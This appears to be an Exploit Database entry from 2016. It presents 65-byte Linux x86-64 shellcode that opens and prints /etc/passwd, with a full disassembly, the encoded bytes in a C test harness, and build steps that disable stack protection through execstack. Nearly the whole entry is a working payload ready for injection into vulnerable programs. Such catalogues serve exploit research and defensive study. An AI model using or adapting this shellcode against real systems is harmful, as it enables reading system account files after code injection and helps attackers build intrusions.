Linux/x64 - Read /etc/passwd Shellcode (65 bytes)

EDB-ID:

39700

CVE:

N/A




Platform:

Linux_x86-64

Date:

2016-04-15


/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - Read /etc/passwd - 65 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 2f                 jmp    0x4000b1
  400082: 5f                    pop    rdi
  400083: 6a 02                 push   0x2
  400085: 58                    pop    rax
  400086: 48 31 f6              xor    rsi,rsi
  400089: 0f 05                 syscall 
  40008b: 66 81 ec ef 0f        sub    sp,0xfef
  400090: 48 8d 34 24           lea    rsi,[rsp]
  400094: 48 97                 xchg   rdi,rax
  400096: 48 31 d2              xor    rdx,rdx
  400099: 66 ba ef 0f           mov    dx,0xfef
  40009d: 48 31 c0              xor    rax,rax
  4000a0: 0f 05                 syscall 
  4000a2: 6a 01                 push   0x1
  4000a4: 5f                    pop    rdi
  4000a5: 48 92                 xchg   rdx,rax
  4000a7: 6a 01                 push   0x1
  4000a9: 58                    pop    rax
  4000aa: 0f 05                 syscall 
  4000ac: 6a 3c                 push   0x3c
  4000ae: 58                    pop    rax
  4000af: 0f 05                 syscall 
  4000b1: e8 cc ff ff ff        call   0x400082
  4000b6: 2f                    (bad)  
  4000b7: 65 74 63              gs je  0x40011d
  4000ba: 2f                    (bad)  
  4000bb: 70 61                 jo     0x40011e
  4000bd: 73 73                 jae    0x400132
  4000bf: 77 64                 ja     0x400125

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o read_passwd read_passwd.c
$ execstack -s read_passwd
$ ./read_passwd

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
void main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) sh;
	(int)(*func)();
}